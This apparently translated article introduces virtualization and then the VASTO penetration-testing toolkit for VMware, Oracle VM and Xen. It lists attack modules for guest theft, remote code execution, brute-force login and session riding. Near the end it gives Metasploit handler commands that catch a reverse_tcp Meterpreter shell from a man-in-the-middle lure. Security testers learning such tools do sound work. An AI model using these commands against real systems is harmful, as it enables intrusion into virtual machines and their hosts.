Virtualization is being adopted by more and more enterprises, and cloud computing, currently a hot topic, also relies on it. Virtualization makes the use of physical resources more flexible and convenient. But how secure are virtual machines? Are they as safe as a traditional architecture?
What is virtualization?
Virtualization means that computer components run on a virtual basis rather than on a real one. Virtualization technology can expand hardware capacity and simplify software reconfiguration. CPU virtualization allows a single CPU to simulate multiple CPUs in parallel, so that one platform can run multiple operating systems at the same time and applications can run in mutually independent spaces without affecting each other. This significantly improves the efficiency of the computer.
Let's take a look at the virtual machine hierarchy
A virtual machine is completely independent of its underlying physical hardware. For example, you can configure virtual components (such as the CPU, NIC, and SCSI controller) that are completely different from the physical components of the underlying hardware. Each virtual machine on the same physical server can even run a different type of operating system (Windows, Linux, etc.).
Penetration Testing for virtual machines
VASTO is a dedicated virtual machine penetration testing tool that supports VMware, Oracle, and Xen. It integrates well with Metasploit. The official VASTO website is http://vasto.nibblesec.org/, and the latest version is v0.4 (it has not been updated for a long time, which hurts).
Decompress the package before use, and then copy it into the Metasploit folder.
The main modules of VASTO are as follows:
abiquo_guest_stealer – Abiquo guest stealer
abiquo_poison – Abiquo poison
eucalyptus_bouncer – Eucalyptus Bouncer
eucalyptus_poison – Eucalyptus Poison
oraclevm_oravma_fileread – Oracle VM agent remote code execution
vmware_autopwner – VMautopwn
vmware_guest_stealer – VMware Guest Stealer
vmware_login – VMware Login check scanner
vmware_session_rider – VMware Session Rider
vmware_studio_upload – VMware Studio < 2.0.0.946-172280 Remote Code Execution
vmware_updatemanager_traversal – Update manager path traversal
vmware_version – VMware products fingerprinter
vmware_vilurker – VIlurker VIclient attack
vmware_webaccess_portscan – VMware Web Access Relay Port Scanner
xen_login – Xen Login Check Scanner
oracle_oravma_exec – Oracle VM agent remote code execution
vmware_sfcbd_exec – VMware VAMI-sfcbd remote code exec
vmware_tomcat_killer – VMware tomcat killer
Version scanner module: used to determine the VM version and other information.
Login module: this module can use a dictionary to attempt brute-force logins to virtual machines.
VIlurker module
This module uses ettercap to conduct a man-in-the-middle attack. After successful spoofing, a form pops up when the client accesses the server. If the user clicks it, a Meterpreter session connects back.
Start a multi/handler listener first:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <Local Host IP here>
msf exploit(handler) > exploit
The spoofing process is as follows:
The shell (Meterpreter) is returned.
Reference
http://www.s3cur1ty.de/vmware-attack-toolkit-vasto